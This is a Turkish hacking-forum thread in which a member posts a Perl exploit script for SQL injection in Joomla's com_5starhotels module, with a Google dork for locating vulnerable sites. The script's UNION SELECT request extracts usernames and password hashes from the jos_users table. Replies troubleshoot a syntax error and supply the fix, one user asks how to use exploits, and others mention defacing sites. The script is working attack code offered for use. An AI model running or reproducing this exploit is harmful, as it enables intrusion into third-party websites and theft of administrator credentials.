Joomla Exploit! Milw0rmdan Önce TBT

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nitrous
    Nitrous's avatar
    Kayıt Tarihi: 01/Nisan/2007
    Erkek
    #!/usr/bin/perl -w
     
     
    #Joomla com_5starhotels Sql injection#
    ########################################
    #[~] Author :  EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label TURK Godlike Nitrous 
     
    #[!] Module_Name:  com_5starhotels
    #[!] Script_Name:  Joomla
    #[!] Google_Dork:  inurl:"com_5starhotels"
    ########################################
     
     
    system("color FF0000");
    system("Nohacking");
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|                 Turkish Securtiy Team                      |\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
    print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
     
    use LWP::UserAgent;
     
    print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
     chomp(my $target=);
     
    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";
     
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
     
    $host = $target .   "/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,".$column_name."+from/**/".$table_name."--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
      print "\n[+] Admin Hash : $1\n\n";
      print "#   Tebrikler Exploit Calisti!  #\n\n";
    }
    else{print "\n[-] Exploit Bulunamadı...\n";


    << Nitrous@TahriBaT.com >>
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sigortacı
    DJ_Alper
    DJ_Alper's avatar
    Bilgi/Destek Madalyası
    Kayıt Tarihi: 03/Ocak/2006
    Erkek
    Joomlada orospu oldu :)=

    edit: paylaşım için saollasın eskiden olsa exploiti hemen denerdim nedense hiç kullanasım yok yaşlanıyorum acaba ondanmı ki? heves kalmadı heves  körerdik a.q

    Sorularınızı cilginsigortaci@gmail.com a yazabilirsiniz cevaplar instagram sayfasında >>>instagram/cilginsigortaci/ █║▌│█│║▌║││█║▌║▌║
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek
    bende öyle artık sıktı çünkü  birde özellikle

    zone-h için durmadan site kasanlar yok mu ne akla ne amaca hizmetediyorlar anlamadım  gecelerini gündüzünü okulunu işini aksatıp zoneye çalışan elemanlar var hiçbir kazançları yok bunu uğruna kazançları olan işlerdende nasiplenemiyorlar yazık yaa 

    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    mosquit0
    mosquit0's avatar
    Kayıt Tarihi: 02/Mart/2008
    Erkek

    C:\Perl>perl real.pl
    syntax error at real.pl line 28, near "=)"
    Execution of real.pl aborted due to compilation errors.


    adaletin bu suçu önleyemiyecek olduğunu düşünüyorsan yargıçda sen ol cellad da
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Varg
    Varg's avatar
    Kayıt Tarihi: 08/Mayıs/2007
    Erkek
    joomla da sorun yok. modülleri yazanların amatörlüğü o. dogru duzgun modüller kullanırsanız hacklenmezsiniz
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek

    @mosquit0

    chomp(my $target=<STDIN> ); şöyle değiştirince çalışıyor.

    http://img255.imageshack.us/img255/6346/k5qt7.jpg 

     

     


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BosphorusPasha
    BosphorusPasha's avatar
    Kayıt Tarihi: 30/Eylül/2007
    Erkek
    nasıl kullanılıyo bu exploitler :/
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fatih
    Fatih's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    sağolasın nitro :).

     

    edit: otel modülü içinmiş. yine de bulunsun bi köşede :).


    enjoy i'm vaccinated
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    enes
    enes's avatar
    Kayıt Tarihi: 11/Nisan/2007
    Erkek
    deneyelim yaw zarar çıkmaz :D

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    enes
    enes's avatar
    Kayıt Tarihi: 11/Nisan/2007
    Erkek
    BENDE ÇALIŞMADI YAW

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    http://www.milw0rm.com/exploits/7575

    milw0rm de yayınlandı :) biraz önce


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
Toplam Hit: 3568 Toplam Mesaj: 13